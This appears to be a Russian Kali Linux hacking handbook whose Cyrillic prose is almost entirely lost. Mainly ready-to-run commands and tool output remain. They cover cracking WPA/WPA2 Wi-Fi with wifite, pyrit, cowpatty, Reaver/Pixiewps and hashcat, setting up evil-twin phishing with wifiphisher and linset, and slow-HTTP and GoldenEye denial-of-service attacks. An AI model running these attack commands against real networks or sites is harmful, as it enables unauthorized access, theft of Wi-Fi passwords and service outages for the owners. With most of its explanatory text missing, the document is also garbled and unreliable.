Академический Документы
Профессиональный Документы
Культура Документы
( WebWare.biz)
, , :
(alex@webware.biz)
: WebWare.biz
.
, - !
2
................................................................................................................................ 4
................................................................................................................. 5
1. Kali Linux ........................................................................... 6
Kali Linux? .......................................................................................................... 6
Kali Linux:
....................................................................................................... 7
VirtualBox Guest Additions Kali Linux 1.1.0 ............................................. 23
Kali Linux ( ............... 24
VMware Kali ............................................................. 43
VPN Kali Linux
VPN ..................................................................................................................... 44
Kali Linux ........... 49
2. Kali Linux ............................................................................................. 51
Kali Linux 1.1.0. 1.
...................................................................................................................... 51
Kali Linux 1.1.0. 2.
........................................................................................................................ 58
3. ....................................................... 77
Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux ............... 77
Wifi WPA/WPA2 Reaver .......................................... 81
Reaver t6x Pixie Dust ................ 85
WPA2/WPA Hashcat Kali Linux ( Wi-
Fi ) .......................................................................................................... 90
Wifite Pixiewps .................................................................................. 95
Wi-Fi : , Kali Linux ............................. 97
Router Scan by StasM Kali Linux ( Wi-Fi
) ....................................................................................................................... 104
4. - ................................................................................................................. 109
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow
body slow read ................................................................ 109
- : DoS - Kali Linux GoldenEye ......................................... 117
- Low Orbit Ion Cannon (LOIC) ......................................................... 123
5. - ............................................................................ 129
SQLMAP Kali Linux: - SQL-
........................................................................................................................... 129
WordPress: WPScanner Plecost ....................................... 138
W3af Kali Linux .............................................................................................. 142
Metasploit Framework Kali Linux ........................................................ 145
3
- Kali Linux .
WebWare.biz.
WebWare.biz : -
- ( ), . (
) .
, ,
.
- , .
- , ,
, ,
- . - , .
. ,
Shift+Delete.
- . : ,
, . ,
, WebWare.biz. -
WebWare.biz . , - ,
( , , ) -
.
. ( -,
, ,
). , , ,
,
http://webware.biz/?page_id=27 .
, , ,
http://webware.biz/?p=3327, , .
: . -
, : http://webware.biz/?p=3920.
,
5
. .. .
- , http://webware.biz/?p=3920,
, , .
- , :
http://webware.biz/?goto=3
VPS - , , :
http://webware.biz/?goto=478388
- : WebWare.biz
: http://webware.biz/?p=3920
, Linux, - ,
WebWare.biz: http://ZaLinux.ru/
6
1. Kali Linux
Kali Linux?
o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.
Kali Linux:
,
, .
, VirtualBox, ,
VirtualBox :
9
,
( Live-
, ):
10
.
. . .
, 30 , ,
30 , . . .
, (,
2-3 ),
:
11
,
, ,
. -
, , . 10
, , :
12
. -
, Kali Linux:
:
14
Live- ( ),
. Instal ():
, ,
.
:
15
( , ):
16
. .
( , Enter):
17
Enter:
. :
18
, :
, :
19
, . . Kali Linux
:
20
( , -
):
21
.iso ,
:
22
'root' :
23
Kali Linux
.
Kali Linux (
Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows .
, (SSD).
( ), (
) , , . , ,
.
25
VirtualBox.
. Linux ,
. , ,
. , , VirtualBox.
. , ,
Linux. , , , , Debian (64 bit).
64- ,
.
26
. , , 1 .
.
, :
27
, .
.
. Kali Linux .
, !
. Kali Linux :
28
, ( ).
. , Kali Linux . ,
. ,
USB- (
) . Linux Mint.
: , VirtualBox . ..
.
: USB 3 USB 2. VirtualBox
5 USB 3 ( ). ,
.
( - ) Linux
. , . ..
- , -.
, ,
, :
29
. , .
, Kali.
30
31
32
33
. USB 3,
.
34
- :
35
.
, .
. .
Kali Linux
Windows , ,
. Delete Esc (
). ,
.
, . , USB 3,
. USB 2.
Windows ( ),
Microsoft UEFI. ,
( , ?).
(
):
1 shutdown.exe /r /o
,
. :
36
UEFI:
37
:
38
, -.
, . Boot,
Boot Option Priorities, :
.
Secure Boot (Disable):
39
:
42
! .
F2. Delete.
.
, . .
, Esc F*.
Boot Option Priorities. .
, Windows Boot Manager,
: , Linux
. , Windows
!
:
43
VirtualBox .
Live- Linux
CD (DVD)-, , .
:
CD (DVD)- ( );
.
( Linux ),
( ).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live USB
Kali,
. .
VMware Kali
44
VMware,
VMware,
VMware Kali.
opt open-vm-toolbox, VMware.
open-vm-tools
, , VMware
Kali VMware.
1 apt-get install open-vm-toolbox
VMware Kali
vmware-tools ,
. vmware-tool
.
1 cd ~
2 apt-get install git gcc make linux-headers-$(uname -r)
3 git clone https://github.com/rasa/vmware-tools-patches.git
4 cd vmware-tools-patches
ISO VMware, Install VMware Tools
( VMware) . ISO
VMware , ,
:
1 cd ~/vmware-tools-patches
2 cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
3 ./untar-and-patch-and-compile.sh
(, , ,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)
3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !), (, Alexa, Google Toolbar . .).
VPN Kali Linux
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
, .
46
, .
, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , - 1969 kB,
).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.
48
,
VPN:
Kali Linux
(
) Kali. ,
. ,
1 cat /etc/apt/sources.list
:
#
- , - .
, :
if cat /etc/apt/sources.list | grep -E "deb http://http.kali.org/kali kali main non-free contrib" && cat /
1
echo -e "\n\n "; else echo -e "\n\n "; fi
. , :
:
echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb http://security.kali.org/kali-
security kali/updates main contrib non-free" > /etc/apt/sources.list
, sources.list (
). .. - ,
. , .
,
Kali.
:
50
:
1 root@WebWare-Kali:~# cat /etc/apt/sources.list
2 deb http://http.kali.org/kali kali main non-free contrib
3 deb http://security.kali.org/kali-security kali/updates main contrib non-free
.
, :
1 apt-get update
51
2. Kali Linux
Kali Linux ,
, ,
.
Information Gathering
.
.
Vulnerability Analysis
52
.
, ,
( Information Gathering).
Web Applications
-.
. ,
- -,
. , - .
Password Attacks
53
, (
)
.
Wireless Attacks
. 802.11 , , aircrack,
airmon . ,
RFID Bluetooth. ,
,
Kali .
Exploitation Tools
54
.
(Vulnerability Assessment)
.
,
, (spoofing).
VoIP
Maintaining Access
55
(Maintaining Access)
.
,
, ,
, .
Reverse Engineering
, , (debug) .
, ,
, , .
, ,
,
.
56
Stress Testing
(Stress Testing)
.
,
(
).
Hardware Hacking
Android,
Android,
Forensics
57
(Forensics)
, .
Reporting Tools
(Reporting tools) ,
.
58
System Services
Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.
Kali Linux , , -,
Kali Linux,
(, ).
. , -
. , ,
, , -,
( . .),
. , !
Kali Linux ,
.
1. HTTrack -
- . ,
PHP . ,
. ,
.
59
Kali Linux, ,
:
1 apt-get install httrack
, , ,
HTTrack:
1 mkdir webware.biz
2 cd / webware.biz
3 httrack
, , URL ( )
, webware.biz , :
60
1 1. ()
2 2. ()
3 3.
4 4. URL
5 5. URL ( )
6 0.
. , ,
, (*),
() , , ,
:
61
HTTrack ( ):
62
, ,
.
2. fping Nmap
63
ping, , . ,
ICMP . fping
.
IP ICMP.
DNS ( webware.biz
, ):
1 dig -t ns webware.biz
4. Fierce
, , webware.biz mail.webware.biz,
cloud,webware.biz, th.webware.biz ..
( ):
1 fierce -dns webware.biz
zone transfer , .
65
5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,
.
:
66
, , .
67
:
68
69
6. Nmap
Nmap . Nmap
, , ,
.
, , .
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,
Kali Linux | Information Gathering | Network Scanners | zenmap
,
.
70
:
71
72
7. Metagoofil
!
, , , GPS
, ,
- . , ,
.
Metagoofil , :
73
1 -d:
2 -t: (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
3 -l: ( 200)
4 -h: ( "yes" )
5 -n:
6 -o: ( )
7 -f: ,
:
1 metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:
74
:
75
:
76
, - ( , GPS
, ), - ! -
.
77
3.
: .
, , , ,
.
, .
,
Wi-Fi.
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda calpp Kali
Linux
Wifi WPA/WPA2 ,
. . ,
.
,
Wifi WPA/WPA2, pyrit cowpatty Kali Linux,
, cuda calpp (cal++),
WiFite . Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA WPA2,
HashCat cudaHashcat oclHashcat Wifi WPA WPA2
. Hashcat ,
, , .
,
,
. Hashcat Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 ,
12 . 4 , 3 .
,
, , .
.
: ,
. , Kali Linux,
, . .
802.11 Kali Linux ( USB). ,
78
,
-, .
handshake WiFite
WiFite, Aircrack-ng, ?
.
:
1 airmon-ng start wlan0
Kali Linux:
1 wifite -wpa
1 wifite wpa2
(wep, wpa or wpa2),
,
1 wifite
, (
). CLIENTS. ,
clients, .
. all
, , . 1,2 ENTER.
, clients, ,
. . . , .
, , , , -
.
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, WIfite, . . :
1 What do you want to do?
2
3 [c]ontinue attacking targets
4
5 [e]xit completely.
c, , e . ,
. c .
1 2. , . .
. , , ,
,
.
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.
, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
79
, . . 20% ( )
.
.
.cap Wi-Fi
, .
Kali Linux , .
. Kali Linux.
root.
1 cp /usr/share/wordlists/rockyou.txt.gz .
.
1 gunzip rockyou.txt.gz
, , WPA2 8 ,
, , 8
63 ( , ,
). , newrockyou.txt.
1 cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
1 wc -l newrockyou.txt
9606665 .
.
1 wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst.
1 mv newrockyou.txt wpa.lst
ESSID Pyrit
ESSID Pyrit
1 pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
1 pyrit -e 'NetComm Wireless' create_essid
, .
, ESSID, Pyrit
Pyrit
, ESSID Pyrit,
.
wpa.lst Pyrit.
1 pyrit -i /root/wpa.lst import_passwords
Pyrit, (batch)
,
1 pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
. ,
.
.
80
1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. .
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, . 159159186.00
PMK's 1 . , ,
.
: NVIDIA
CUDA Cpyrit-CUDA. , .
, .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424 captured
bytes, only got 259".
(handshake) , Pyrit
crunch,
( ),
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, . Pyrit
cowpatty airolib-ng. ,
cowpatty , .
cowpatty. ,
, cowpatty.
1 pyrit -e BigPond -o cow.out export_cowpatty
: WPA WPA2 PSK cowpatty
, cowpatty, WPA2/PSK.
1 cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
, .
, . ,
. 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.
cow.out Pyrit
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid .
1 pyrit -e BigPond delete_essid
81
. , Wifi
WPA/WPA2 Reaver-WPS. ,
.
, , ,
.
Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver WPA/WPA2
() 4-10 , . ,
WPS .
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. , , Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit cowpatty
Kali Linux. ( Wifite)
.
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, . ,
, ,
. Hashcat ,
Wifi WPA/WPA2, MD5, phpBB, MySQL, SHA1 .
Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: . -
. :
, . 10^8
82
(100,000,000) . ,
, . . , ,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3 (1,000), . .
.
Reaver , .
, , 11,000. , Reaver
.
,
, 10 .
Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).
Reaver
1 airmon-ng
, . wlan0.
airmon-ng start <_>
:
1 airmon-ng start wlan0
Reaver : BSSID . ,
, BSSID :
1 airodump-ng --wps wlan0mon
83
M5 M7 WPS 0.1 .
, (
1 ):
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS , ,
, NACK, .
, M5/M7, NACK .
, , NACK' ( ),
. ,
Reaver , NACK'
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate
10 WPS,
. ,
, ,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360
, Reaver 1 .
-d 0 , :
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
, , dh-small.
Reaver -,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small
Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x Pixie Dust
Kali Linux. . ..
, Reaver.
Pixiewps . -K 1.
, Reaver Pixiewps. ..
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1
Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-log
reaver; -P // pixiedust-loop reaver
MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
1 # ifconfig wlan0 down
85
Reaver?
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
- https://code.google.com/p/reaver-wps/. Pro
.
Reaver
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , , .
Pixiewps
Pixiewps ( Kali Linux, ,
sudo):
1 sudo apt-get install libssl-dev
.
zip- Download ZIP.
Kali Linux , Linux
.
86
1 cd Downloads
2 unzip pixiewps-master.zip
3 cd pixiewps-master/src
4 make
5 gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
6 make install
1 install -D pixiewps /usr/local/bin/pixiewps
2 install -m 755 pixiewps /usr/local/bin
Reaver t6x
, Kali Linux ,
" ". .
Reaver, .
.
Reaver
1 apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.
Reaver
1
2 git clone https://github.com/t6x/reaver-wps-fork-t6x
3
4 wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip
5
6
7 cd reaver-wps-fork-t6x*/
8 cd src/
9 ./configure
10 make
11
12
13 sudo make install
Reaver
Reaver ,
.
87
Reaver , . ,
,
1 reaver -v
2 Reaver v1.4 WiFi Protected Setup Attack Tool
3 Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, .
1 :
2 -i, --interface=<wlan>
3 -b, --bssid=<mac> BSSID
4
5 :
6 -m, --mac=<mac> MAC
7 -e, --essid=<ssid> ESSID
8 -c, --channel=<channel> 802.11 (
9 -f)
10 -o, --out-file=<file> - [stdout]
11 -s, --session=<file>
12 -C, --exec=<command>
13
14 -D, --daemonize reaver
15 -a, --auto
16
17 -f, --fixed
18 -5, --5ghz 5GHz 802.11
19 -v, --verbose (-vv
20 )
21 -q, --quiet
22 -K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2,
23E-Nonce Authkey (Ralink, Broadcom, Realtek)
24 -Z, --no-auto-pass reaver
25WPA, pixiewps
26 -h, --help
27
28 :
88
7 -o, --out-file=<file>
8 -n, --probes=<num>
9 [15]
10 -D, --daemonize wash
11 -C, --ignore-fcs
12 -5, --5ghz 5GHz 802.11
13 -s, --scan
14 -u, --survey [default]
15 -P, --file-output-piped Wash
16 . . wash x|y|z...
-g, --get-chipset reaver
-h, --help
:
1 wash -i mon0
-g // get-chipset
-g wash reaver .
, , . .
reaver (30
).
- ()
,
Hashcat .
Hashcat
Hashcat :
Hashcat
oclHashcat
, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt . -
, ( ),
oclHashcat Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows -
OpenCL OSX.
Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-)
cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit
Hashcat WPA WPA2?
Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.
92
1 ?l = abcdefghijklmnopqrstuvwxyz
2 ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
3 ?d = 0123456789
4 ?s = !#$%&'()*+,-./:;?@[\]^_`{|}~
5 ?a = ?l?u?d?s
6 ?b = 0x00 - 0xff
, 12345678.
?d?d?d?d?d?d?d?d
, 12345678 23456789
01567891. , .
, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.
, : abcdefgh dfghpoiu bnmiopty
. ., :
?l?l?l?l?l?l?l?l
. , .
, a1b2c3d4 p9o8i7u6 n4j2k5l6 . . (
), :
?l?d?l?d?l?d?l?d
, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, , .
,
:
?a?a?a?a?a?a?a?a
: ?a , .
, .
.
- ,
.
. . ,
, abc, -
. :
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
- , 125 .
. cudaHashcat
oclHashcat Hashcat Kali Linux WPA2 WPA .
93
,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.
Hashcat
.
:
1 --custom-charset1=CS
2 --custom-charset2=CS
3 --custom-charset3=CS
4 --custom-charset4=CS
CS . CS
, . . ,
, .
: -1, -2, -3 -4.
hashcat ( .hcchr,
/, ).
:
,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-
numeric):
1 -1 abcdefghijklmnopqrstuvwxyz0123456789
2 -1 abcdefghijklmnopqrstuvwxyz?d
3 -1 ?l0123456789
4 -1 ?l?d
5 -1 loweralpha_numeric.hcchr # , + (abcdefghijk
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka mixalpha-
numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux .hcchr
:
1 tree /usr/share/maskprocessor/charsets/
2
3 tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
94
-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,
Wifi WPA2 WPA pyrit cowpatty Kali Linux. ,
.
.cap wpaclean
.cap , Hashcat
(cudaHashcat oclHashcat).
.cap Kali Linux.
1 wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>. ,
.
:
wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap
.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
1 aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
1 aircrack-ng hs/out.cap -J hs/out
WPA2 WPA Hashcat
Hashcat (cudaHashcat oclHashcat) .
:
- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB, MySQL
SHA1 Hashcat Kali Linux. :
1 hashcat --help | grep WPA
.. 2500.
:
1 hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
1 oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
1 cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
95
, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali Linux
.
. .
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
1 hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d
-m = 2500 WPA2 WPA.
-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
, . ,
webware-1.hcmask. .
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat :
1 ls /usr/share/oclhashcat/masks/
,
:
1 cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask
.hcmask file
.hcmask :
1 tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .
Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root.
1 cat hashcat.pot
. ,
hashcat.net, .
.
, : ,
, , , ,
.
( ),
WebWare.biz. , !
Wifite Pixiewps
Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
96
Kali Linux , ,
. Kali
,
.
, ,
. ,
.
. (Wi-Fi).
,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
() ;
98
/ / ,
.
( ) ,
,
. ,
. , ,
.
,
. .
1 cd ~
2 mkdir opt
wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. .. .
WPA/WPA2.
Wifiphisher Kali Linux MIT .
, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
. ,
. NAT/DHCP
. , -
. --.
3.
. wifiphisher - HTTP & HTTPS
. , wifiphisher
, , , ,
, WPA .
wifiphisher
, .
hostapd, , , :
1 apt-get install hostapd
wifiphisher
1 cd ~/opt
2 git clone https://github.com/sophron/wifiphisher
3 cd wifiphisher/
:
1 python wifiphisher.py
99
wifiphisher?
100
,
,
waidps. .
waidps
: https://github.com/SYWorks/waidps
waidps , .
.
.
. .
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali Linux
.
, ( ) ,
( WEP/WPA/WPS)
( ). , WiFi
.
: MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP
WEP chopchop
WPS Reaver, Bully ..
- (Evil-Twin)
waidps
1 cd ~/opt
2 git clone https://github.com/SYWorks/waidps
3 cd waidps
4 python waidps.py
:
101
Chopchop:
Chopchop :
Chopchop :
102
3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
1 cd ~/opt
2 git clone https://github.com/P0cL4bs/3vilTwinAttacker
3 cd 3vilTwinAttacker
4 chmod +x install.sh ./install --install
1 python 3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu
1 $ sudo apt-get install isc-dhcp-server
Kali linux
1 apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora
1 $ sudo yum install dhcp
103
linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).
linset
104
.
Kali Linux ( ).
. :
1 apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk
. linset , ,
.
:
1 cd ~/opt
2 git clone https://github.com/vk496/linset
3 cd linset
4 chmod +x linset ./linset
linset
( )
-
,
DHCP
DNS
-
,
, , -
,
,
. ..
.
, .
, , ,
. ,
. , , ( nmap,
PHP) ,
. ,
Stas'M, curl.
106
107
:
108
- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
, , , :
mvd.ru
109
4. -
- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow
read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), , Apache
Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
, .
HTTP ,
, .
, .
HTTP, HTTP .
Slow Read , slowloris slow body,
, HTTP , .
SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
1 apt-get install slowhttptest
110
Linux
, . .
, , , .
: SlowHTTPTest,
:
.. , .
, , .
1 $ tar -xzvf slowhttptest-x.x.tar.gz
2 $ cd slowhttptest-x.x
3 $ ./configure --prefix=PREFIX
4 $ make
5 $ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
1 brew update && brew install slowhttptest
Linux
, slowhttptest (
Kali Linux).
SlowHTTPTest
111
slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10
-p 3
,
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u
http://192.168.1.37/info.php -x 10 -p 3
Test results against
http://192.168.1.37/info.phpClosedPendingConnectedServiceavailable03691215182124273002004006
00800SecondsConnections
, ,
. , . ,
,
.
Slow Read .
x.x.x.x:8080 , - IP
:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l 350
-e x.x.x.x:8080
:
114
115
SlowHTTPTest
,
5 , (
1), ( 4).
-g CSV, HTML,
Google Chart.
,
.
CSV
, MS Excel, iWork Numbers Google Docs.
, , ,
:
Hit test time limit , -l
No open connections left
Cannot establish connection N ,
N -i, 10 ( ).
.
Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -
Unexpected error .
SlowHTTPTest
, .
,
. .
116
, http://192.168.1.37 1000 .
1 slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168
-
1 root@WebWare-Debian:~# netstat | grep http | wc -l
2 111
, . . SSH
. http 111 10 .
(
VPS).
DoS
DoS , , ,
( ),
DoS , , SlowHTTPTest
.
117
, ,
- ,
. , DoS IP
() . .
,
-.
Windows, Linux Mac. DoS
, GoldenEye, hping3 -,
. DoS (,
- ). , ,
-, .
WebWare.biz!
WebWare.biz DoS,
HTTP, - .
GoldenEye , , 30
, , . ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows, Apache,
OpenBSD .
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.
118
DoS DDoS . ,
DoS . ( )
DDoS . , , , . .
/.
GoldenEye
, , ~/opt.
, :
1 mkdir opt
2 cd opt
, GoldenEye,
GoldenEye ( ):
1 mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master
, .
GoldenEye, :
root@WebWare-Kali:~/opt# mkdir GoldenEye
root@WebWare-Kali:~/opt# cd GoldenEye
root@WebWare-Kali:~/opt/GoldenEye# wget
https://github.com/jseidl/GoldenEye/archive/master.zip
master.zip.
1 unzip master.zip
119
GoldenEye-master,
:
1 ls
2 cd GoldenEye-master/
3 ls
GoldenEye -
, :
1 ./goldeneye.py
:
120
. .
: ( )
. ,
.
.
, .
:
root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py
http://www.goldeneyetestsite.com/
()
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
python goldeneye.py http://www.goldeneyetestsite.com/
, , .
GoldenEye:
top:
.. , ,
